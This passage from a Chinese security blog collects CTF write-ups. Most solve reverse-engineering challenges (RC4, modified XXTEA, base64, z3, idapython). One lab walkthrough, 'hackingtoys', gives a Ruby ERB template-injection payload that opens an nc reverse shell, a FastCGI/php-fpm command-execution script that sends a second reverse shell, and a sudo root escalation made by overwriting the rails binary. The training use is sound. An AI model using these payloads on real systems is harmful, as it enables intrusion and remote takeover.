v6 = (v6 + s[v5]) % 256
v4 = s[v5]
s[v5] = s[v6]
s[v6] = v4
res.append(key[i] ^ (s[(s[v5] + s[v6]) %256]))
return res
def crypt2(s,enc,enc_len):
v5 = 0
v6 = 0
res = []
for i in range(enc_len):
v5 = (v5 + 1) % 256
v6 = (v6 + s[v5]) % 256
v4 = s[v5]
s[v5] = s[v6]
s[v6] = v4
res.append(enc[i] + s[(s[v5] + s[v6])%256])
return res
def init(s,key,key_len):
v8 = [0]*258
for i in range(256):
s[i] = i
v8[i] = key[i % key_len]
v6 =0
for j in range(256):
v6 = (v8[j] + v6 + s[j]) % 256
v4 = s[j]
s[j] = s[v6]
s[v6] = v4
s = [0]*256
key1 = [ord(b) for b in "keykey"]
key = [ord(b) for b in "ban_debug!"]
init(s,key1,len(key1))
res = crypt1(s,key,len(key))
print(res)
s2 = [0]*256
key2 = init(s2, res,len(res))
enc = [0x4E, 0x47, 0x38, 0x47, 0x62, 0x0A, 0x79, 0x6A, 0x03, 0x66,
0xC0, 0x69, 0x8D, 0x1C, 0x84, 0x0F, 0x54, 0x4A, 0x3B, 0x08,
0xE3, 0x30, 0x4F, 0xB9, 0x6C, 0xAB, 0x36, 0x24, 0x52, 0x81,
0xCF]
flag = crypt2(s2,enc,len(enc))
for i in flag:
print(chr(i%256),end="")
'''
运行结果
[105, 13, 90, 178, 64, 234, 25, 63, 47, 106]
flag{1237-12938-9372-1923-4u92}
'''
reverse2思路:有upx, 十六进制查看upx特征是否被修改image-20241110164828280.png将这三个ABC改回成UPX就能脱壳image-20241110164949354.pngida分析代码main函数中看到一个密文image-20241110165204829.png往下看 很明显的base64加密,查看a9876543210zyxw数组image-20241110165249211.png是base64换表image-20241110165347969.pngexp:赛博厨子直接一把梭image-20241110165557240.png
-
hackingtoys
https://dirtycow.cn/256.html
2024-09-16T21:30:00+08:00
信息收集nmap扫端口nmap -sS 10.20.73.121 -T4Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-16 03:48 EDT
Nmap scan report for hacktoys.lan (10.20.73.121)
Host is up (0.00010s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
MAC Address: 00:0C:29:82:76:43 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds开了22 和 3000端口,nmap -sV 扫详细服务nmap -sV 10.20.73.121 -p3000,22┌──(root㉿kali)-[~]
└─# nmap -sV 10.20.73.121 -p3000,22
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-16 03:49 EDT
Nmap scan report for hacktoys.lan (10.20.73.121)
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
3000/tcp open ssl/ppp?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.93%T=SSL%I=7%D=9/16%Time=66E7E361%P=x86_64-pc-linux-gn
SF:u%r(GenericLines,3EF,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-Len
SF:gth:\x20930\r\n\r\nPuma\x20caught\x20this\x20error:\x20Invalid\x20HTTP\
SF:x20format,\x20parsing\x20fails\.\x20Are\x20you\x20trying\x20to\x20open\
SF:x20an\x20SSL\x20connection\x20to\x20a\x20non-SSL\x20Puma\?\x20\(Puma::H
SF:ttpParserError\)\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/li
SF:b/puma/client\.rb:268:in\x20`execute'\n/usr/local/rvm/gems/ruby-3\.1\.0
SF:/gems/puma-6\.4\.2/lib/puma/client\.rb:268:in\x20`try_to_finish'\n/usr/
SF:local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/server\.rb:298:i
SF:n\x20`reactor_wakeup'\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\
SF:.2/lib/puma/server\.rb:248:in\x20`block\x20in\x20run'\n/usr/local/rvm/g
SF:ems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:119:in\x20`wake
SF:up!'\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/react
SF:or\.rb:76:in\x20`block\x20in\x20select_loop'\n/usr/local/rvm/gems/ruby-
SF:3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:76:in\x20`select'\n/usr/
SF:local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:76:i
SF:n\x20`select_loop'\n/usr/loc")%r(GetRequest,169E,"HTTP/1\.0\x20403\x20F
SF:orbidden\r\ncontent-type:\x20text/html;\x20charset=UTF-8\r\nContent-Len
SF:gth:\x205702\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n
SF:\x20\x20<meta\x20charset=\"utf-8\"\x20/>\n\x20\x20<meta\x20name=\"viewp
SF:ort\"\x20content=\"width=device-width,\x20initial-scale=1\">\n\x20\x20<
SF:meta\x20name=\"turbo-visit-control\"\x20content=\"reload\">\n\x20\x20<t
SF:itle>Action\x20Controller:\x20Exception\x20caught</title>\n\x20\x20<sty
SF:le>\n\x20\x20\x20\x20body\x20{\n\x20\x20\x20\x20\x20\x20background-colo
SF:r:\x20#FAFAFA;\n\x20\x20\x20\x20\x20\x20color:\x20#333;\n\x20\x20\x20\x
SF:20\x20\x20color-scheme:\x20light\x20dark;\n\x20\x20\x20\x20\x20\x20supp
SF:orted-color-schemes:\x20light\x20dark;\n\x20\x20\x20\x20\x20\x20margin:
SF:\x200px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20body,\x20p,\x20ol,\x20ul
SF:,\x20td\x20{\n\x20\x20\x20\x20\x20\x20font-family:\x20helvetica,\x20ver
SF:dana,\x20arial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20font-size:\x20\
SF:x20\x2013px;\n\x20\x20\x20\x20\x20\x20line-height:\x2018px;\n\x20\x20\x
SF:20\x20}\n\n\x20\x20\x20\x20pre\x20{\n\x20\x20\x20\x20\x20\x20font-size:
SF:\x2011px;\n\x20\x20\x20\x20\x20\x20white-space:\x20pre-wrap;\n\x20\x20\
SF:x20\x20}\n\n\x20\x20\x20\x20pre\.box\x20{\n\x20\x20\x20\x20\x20\x20bord
SF:er:\x201px\x20solid\x20#EEE;\n\x20\x20\x20\x20\x20\x20padding:\x2010px;
SF:\n\x20\x20\x20\x20\x20\x20margin:\x200px;\n\x20\x20\x20\x20\x20\x20widt
SF:h:\x20958px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20header\x20{\n\x20\x2
SF:0\x20\x20\x20\x20color:\x20#F0F0F0;\n\x20\x20\x20\x20\x20\x20background
SF::\x20#C00;\n\x20\x20\x20\x20\x20\x20padding:");
MAC Address: 00:0C:29:82:76:43 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.17 seconds看到了ssl,尝试使用https访问image-20240916160728361.png漏洞发现web打点查看这五个链接,如图所示,这五个链接都是黑客工具image-20240916171846634.png接下来测试下面的输入框image-20240916172453682.png随意输入内容提示Product does not exist发现这串字符串就是message的参数,修改message为123查看image-20240916172632531.png提示的字符变成了123,这边很明显有一个xss漏洞不过并没什么用image-20240916173245082.png查看网站变成语言,是rubyimage-20240916173606124.pngRuby/ERB ssti经过搜索,这里是ERB的ssti,可用使用<%= (ruby代码) %>模板来执行命名测试一下,将<%= 7*7 %>url编码传入image-20240916180036622.png输入了49,说名存在漏洞尝试反弹shell构造反弹shell命令<%= system("nc -e /bin/sh 10.20.73.233 5555"); %>image-20240916182939850.png有pyhton ,使用python开一下虚拟终端python3 -c "import pty;pty.spawn('/bin/bash')"image-20240916183154924.png提权image-20240916200655562.png在本地开了一个80,9000端口,将这两个端口转发出来lidia@hacktoys:/tmp$ ./socat TCP-LISTEN:9001,reuseaddr,fork TCP:127.0.0.1:9000 &
<CP-LISTEN:9001,reuseaddr,fork TCP:127.0.0.1:9000 &
[1] 1281
lidia@hacktoys:/tmp$ ./socat TCP-LISTEN:8080,reuseaddr,fork TCP:127.0.0.1:80 &
< TCP-LISTEN:8080,reuseaddr,fork TCP:127.0.0.1:80 &
[2] 1282
lidia@hacktoys:/tmp$ ss -nltp
ss -nltp
State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
LISTEN 0 5 0.0.0.0:8080 0.0.0.0:* users:(("socat",pid=1282,fd=5))
LISTEN 0 511 127.0.0.1:80 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:9000 0.0.0.0:*
LISTEN 0 1024 0.0.0.0:3000 0.0.0.0:* users:(("ruby",pid=593,fd=7))
LISTEN 0 5 0.0.0.0:9001 0.0.0.0:* users:(("socat",pid=1281,fd=5))
LISTEN 0 128 [::]:22 [::]:* 访问转发出来的 80端口image-20240916202945326.png测了半天也找到什么漏洞转移目标至9000端口image-20240916203819728.png发现靶机进程中有php-fpm,它的默认端口正好是9000https://book.hacktricks.xyz/network-services-pentesting/9000-pentesting-fastcgi在网上找到大佬的的脚本可以直接命令执行改个端口和路径就能直接打#!/bin/bash
PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/html/index.php" # Exisiting file path
HOST=$1
B64=$(echo "$PAYLOAD"|base64)
for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9001 &> $OUTPUT
cat $OUTPUT
doneimage-20240916205923580.png发现使用dodi用户,直接反弹shell提权至该用户提权至dodi修改执行的命令#!/bin/bash
PAYLOAD="<?php echo '<!--'; system('nc -e /bin/bash 10.20.73.233 6666'); echo '-->';"
FILENAMES="/var/www/html/index.php" # Exisiting file path
HOST=$1
B64=$(echo "$PAYLOAD"|base64)
for FN in $FILENAMES; do
OUTPUT=$(mktemp)
env -i \
PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
cgi-fcgi -bind -connect $HOST:9001 &> $OUTPUT
cat $OUTPUT
doneimage-20240916210302784.png提权至rootsudo -l 发现该用户可以使用sudo运行/usr/local/bin/rvm_rails.sh这个脚本image-20240916210822816.png运行脚本dodi@hacktoys:/var/www/html$ sudo /usr/local/bin/rvm_rails.sh
sudo /usr/local/bin/rvm_rails.sh
Usage:
rails COMMAND [options]
You must specify a command:
new Create a new Rails application. "rails new my_app" creates a
new application called MyApp in "./my_app"
plugin new Create a new Rails railtie or engine
All commands can be run with -h (or --help) for more information.
Inside a Rails application directory, some common commands are:
console Start the Rails console
server Start the Rails server
test Run tests except system tests发现是rails Rails 是使用Ruby 语言编写的网页程序开发框架分析脚本#!/bin/bash
export rvm_prefix=/usr/local
export MY_RUBY_HOME=/usr/local/rvm/rubies/ruby-3.1.0
export RUBY_VERSION=ruby-3.1.0
export rvm_version=1.29.12
export rvm_bin_path=/usr/local/rvm/bin
export GEM_PATH=/usr/local/rvm/gems/ruby-3.1.0:/usr/local/rvm/gems/ruby-3.1.0@global
export GEM_HOME=/usr/local/rvm/gems/ruby-3.1.0
export PATH=/usr/local/rvm/gems/ruby-3.1.0/bin:/usr/local/rvm/gems/ruby-3.1.0@global/bin:/usr/local/rvm/rubies/ruby-3.1.0/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/rvm/bin
export IRBRC=/usr/local/rvm/rubies/ruby-3.1.0/.irbrc
export rvm_path=/usr/local/rvm
exec /usr/local/rvm/gems/ruby-3.1.0/bin/rails "$@"脚本之后执行了/usr/local/rvm/gems/ruby-3.1.0/bin/rails这个文件image-20240916211743699.pngdodi@hacktoys:/var/www/html$ cat /etc/group | grep rvm
cat /etc/group | grep rvm
rvm:x:1002:lidia,rootlidia用户对该文件有修改权限,使用该用户在这个文件中写入/bin/bash即可提权lidia@hacktoys:/tmp$ echo "/bin/bash" > /usr/local/rvm/gems/ruby-3.1.0/bin/rails
<in/bash" > /usr/local/rvm/gems/ruby-3.1.0/bin/rails
lidia@hacktoys:/tmp$ dodi@hacktoys:/var/www/html$ sudo /usr/local/bin/rvm_rails.sh
sudo /usr/local/bin/rvm_rails.sh
root@hacktoys:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root),1002(rvm)
-
蓝桥杯-网络安全 reverse wp
https://dirtycow.cn/237.html
2024-04-27T10:18:00+08:00
re1ida查看打开,直接看伪代码image-20240427111249890.png程序逻辑很简单,将输入保存到buff,经过cry函数加密,和密文v6进行比较直接查看cry函数image-20240427111630697.png经过分析,这是一个魔改的xxtea加密,改了循环轮数和DELTA值写脚本解密enc#include <stdio.h>
#include <stdint.h>
#define DELTA 0x9e3779b9
void btea(uint32_t *v, int n, uint32_t const key[4])
{
uint32_t y, z, sum;
unsigned i, rounds, e;
rounds = 415 / n + 114; //确定轮转数
sum = rounds*DELTA; //根据轮转数计算sum
y = v[0];
do
{
e = (sum >> 2) & 3;
for (i=n-1; i>0; i--) //逆序倒推
{
z = v[i-1]; //先解密v[n-1],需要知道v[0]和v[n-2],
v[i] -= (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(i&3)^e] ^ z)));
y = v[i];//只会解密到v[1]
}
z = v[n-1]; //对于第一个v[0]的解密,要知道v[n-1]和v[1]
v[0] -= (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(i&3)^e] ^ z)));
y = v[0];
sum += 0x61C88647;
}
while (--rounds);
}
int main()
{
uint32_t enc_data[] = {0x480AC20C,0x0CE9037F2,0x8C212018,0x0E92A18D,0x0A4035274,0x2473AAB1,0x0A9EFDB58,0x0A52CC5C8,0x0E432CB51,0x0D04E9223,0x6FD07093};
uint32_t const k[4]= {0x79696755,0x67346F6C,0x69231231,0x5F674231};
int n= 11;
btea(enc_data, n, k);
for(int i = 0; i < sizeof(enc_data)/sizeof(uint32_t); i++)
{
printf("%x", enc_data[i]);
}
return 0;
}运行结果:67616c666366657b6638666363302d30312d37392d636532306532383963302d34323964333365327d35为了方便使用python将这段十六进制转换成stringenc = "67616c666366657b6638666363302d30312d37392d636532306532383963302d34323964333365327d35"
for i in range(0,len(enc), 2):
print(chr(int(enc[i:i+2], 16)),end="")运行结果:galfcfe{f8fcc0-01-79-ce20e289c0-429d33e2}5发现flag的顺序不对,应该是大小端序的原因,修改代码enc = "67616c666366657b6638666363302d30312d37392d636532306532383963302d34323964333365327d35"
flag=''
for i in range(0,len(enc), 2):
flag += chr(int(enc[i:i+2], 16))
for i in range(0,len(flag),4):
print((flag[i:i+4][::-1]),end="")运行结果:flag{efccf8f0-0c97-12ec-82e0-0c9d9242e335}re2直接上ida查看伪代码image-20240427093116948.pngimage-20240427093129676.png这里是一堆赋值,最后将这些变量传入了sub_401005函数,跟进去查看image-20240427093427762.png这就是个rc4加密,我们在return上打个断点就能看到解密后的数据image-20240427093458621.png成功getflagimage-20240427093627803.png
-
[羊城杯 2020]easyre wp
https://dirtycow.cn/223.html
2024-02-29T18:53:00+08:00
思路:64位无壳exe直接使用ida打开image-20240229201911471.png对变量名进行简单的处理, 提升代码的可读性对代码进行简单分析Str2加密的flagStr为用户的输入通过三个函数对Str进行三次加密,最终和Str2进行比较直接看encode_three函数image-20240229204446829.png这个函数对字符串进行了偏移,有mod操作就不考虑逆向推了,直接使用暴力破解再看encode_two函数image-20240229204907302.png这个函数对字符串进行了位移,每次位移13个字符再看最后一个函数encode_oneimage-20240229205021296.png这个函数也是一眼丁真了,base64image-20240229205047054.png查看alphabet变量,正是base64的码表写脚本还原flagexp:import base64
enc = "EmBmP5Pmn7QcPU4gLYKv5QcMmB3PWHcP5YkPq3=cT6QckkPckoRG"
enc_decode = ""
enc_decoee_2 = ""
for enum in range(len(enc)):
for enum_char in range(32,128):
if enum_char <= 64 or enum_char > 90:
if enum_char<= 96 or enum_char > 122 :
if enum_char <= 47 or enum_char > 57:
if enc[enum] == chr(enum_char):
enc_decode += chr(enum_char)
else:
if enc[enum] == chr((enum_char - 48 + 3) % 10 +48):
enc_decode += chr(enum_char)
else:
if enc[enum] == chr((enum_char - 97 + 3) % 26 + 97):
enc_decode += chr(enum_char)
else:
if enc[enum] == chr((enum_char - 65 + 3) % 26 + 65):
enc_decode += chr(enum_char)
enc_decoee_2 += enc_decode[13:26]
enc_decoee_2 += enc_decode[39:52]
enc_decoee_2 += enc_decode[0:13]
enc_decoee_2 += enc_decode[26:39]
print(base64.b64decode(enc_decoee_2.encode()))总结:知识点:暴力破解flagGWHT{672cc4778a38e80cb362987341133ea2}
-
[GFCTF 2021]wordy wp
https://dirtycow.cn/216.html
2024-02-28T19:51:00+08:00
思路:64位elf,无壳直接使用ida打开,查看主函数image-20240228183956816.png映入眼帘就是一个CODE XREF和一大堆数据,这肯定是花指令尝试去除花指令image-20240228185207078.png发现有多出了一个花指令继续重复去除花指令image-20240228185359264.png发现疑似flag的字符这种重复的操作直接交给idapython这些字符前面都有FF C0,写脚本通过这两个关键字找出字符image-20240228185943670.pngexp:start_addr = 0x1135
end_addr = 0x3000
for i in range(start_addr, end_addr):
if ida_bytes.get_byte(i) == 0xFF and ida_bytes.get_byte(i+1) == 0xC0:
print(chr(ida_bytes.get_byte(i+3)), end="")运行结果:hello world!
There are moments in life when you miss someone so much that you just want to pick them from your dreams and hug them for real! Dream what you want to dream;go where you want to go;be what you want to be,because you have only one life and one chance to do all the things you want to do.
May you have enough happiness to make you sweet,enough trials to make you strong,enough sorrow to keep you human,enough hope to make you happy? Always put yourself in others'shoes.If you feel that it hurts you,it probably hurts the other person, too.
GFCTF{u_are2wordy}
You find Flag, Congratulation!总结:考点:花指令idapythonflag:GFCTF{u_are2wordy}
-
[ACTF新生赛2020]Universe_final_answer wp
https://dirtycow.cn/209.html
2024-02-26T20:45:00+08:00
思路:查看程序主函数image-20240226204044046.png使sub_860函数返回true就能获得flag跟进去查看image-20240226204238539.png看到这么规律的计算就知道要拿z3秒了exp:from z3 import *
v1,v2, v3, v4, v5, v6, v7, v8, v9, v11 = Ints('v1 v2 v3 v4 v5 v6 v7 v8 v9 v11')
solver = Solver()
solver.add(v1 < 128)
solver.add(v2 < 128)
solver.add(v3 < 128)
solver.add(v4 < 128)
solver.add(v5 < 128)
solver.add(v6 < 128)
solver.add(v7 < 128)
solver.add(v8 < 128)
solver.add(v9 < 128)
solver.add(v11 < 128)
solver.add(-85 * v9 + 58 * v8 + 97 * v6 + v7 + -45 * v5 + 84 * v4 + 95 * v2 - 20 * v1 + 12 * v3 == 12613)
solver.add(30 * v11 + -70 * v9 + -122 * v6 + -81 * v7 + -66 * v5 + -115 * v4 + -41 * v3 + -86 * v1 - 15 * v2 - 30 * v8 == -54400)
solver.add(-103 * v11 + 120 * v8 + 108 * v7 + 48 * v4 + -89 * v3 + 78 * v1 - 41 * v2 + 31 * v5 - (v6 *64) - 120 * v9 == -10283)
solver.add(71 * v6 + (v7 * 128) + 99 * v5 + -111 * v3 + 85 * v1 + 79 * v2 - 30 * v4 - 119 * v8 + 48 * v9 - 16 * v11 == 22855)
solver.add(5 * v11 + 23 * v9 + 122 * v8 + -19 * v6 + 99 * v7 + -117 * v5 + -69 * v3 + 22 * v1 - 98 * v2 + 10 * v4 == -2944)
solver.add(-54 * v11 + -23 * v8 + -82 * v3 + -85 * v2 + 124 * v1 - 11 * v4 - 8 * v5 - 60 * v7 + 95 * v6 + 100 * v9 == -2222)
solver.add(-83 * v11 + -111 * v7 + -57 * v2 + 41 * v1 + 73 * v3 - 18 * v4 + 26 * v5 + 16 * v6 + 77 * v8 - 63 * v9 == -13258)
solver.add(81 * v11 + -48 * v9 + 66 * v8 + -104 * v6 + -121 * v7 + 95 * v5 + 85 * v4 + 60 * v3 + -85 * v2 + 80 * v1 == -1559)
solver.add(101 * v11 + -85 * v9 + 7 * v6 + 117 * v7 + -83 * v5 + -101 * v4 + 90 * v3 + -28 * v1 + 18 * v2 - v8 == 6308)
solver.add(99 * v11 + -28 * v9 + 5 * v8 + 93 * v6 + -18 * v7 + -127 * v5 + 6 * v4 + -9 * v3 + -93 * v1 + 58 * v2 == -1697)
if solver.check() == sat:
print (solver.model())
flag = [70,48,117,82,84,121,95,55,119,64]
for i in flag:
print(chr(i), end="")右移可以使用乘法代替flag:actf{F0uRTy_7w@_42}
-
[Zer0pts2020]easy strcmp wp
https://dirtycow.cn/208.html
2024-02-26T16:26:00+08:00
思路是个64位程序,直接拿ida打开image-20240226112347596.png发现程序将用户输入和字符串zer0pts{********CENSORED********}比较尝试提交flag 发现是错误的继续分析查看init函数image-20240226114941107.png程序分别调用了funcs_889开始的几个函数跟进去查看image-20240226115104941.png跟进sub_6E 发现没东西image-20240226125443454.png在这个函数附近看到了sub_795跟进去查看image-20240226125549410.png这个函数将qword_201090函数替换成strcmpoff_201028替换成了sub_6EA跟进off_201028查看image-20240226155507023.png正是 strcmp在plt表中的位置 查看sub_6EA函数的逻辑image-20240226155809056.png查看qword_201060值image-20240226160538423.png只要按照上面的代码加回qword_201060中的值就能还原flagexp#include<stdio.h>
#include<stdint.h>
#include<string.h>
int main()
{
char enc[] = "zer0pts{********CENSORED********}";
uint64_t key[] = {0, 0x410A4335494A0942, 0x0B0EF2F50BE619F0, 0x4F0A3A064A35282B, 0};
int len = strlen(enc);
len = (len>>3) +1;
for(int i =0; i < len; i++)
{
*(uint64_t *)&(enc[8 * i]) += key[i];
}
printf("%s", enc);
return 0;
}因为是qword数据类型,所有要使用uint64_t或者__int64这里不直接写enc[8 * i]是因为要将char型转换成_int64, 用指针的形式写flagzer0pts{l3ts_m4k3_4_DETOUR_t0d4y}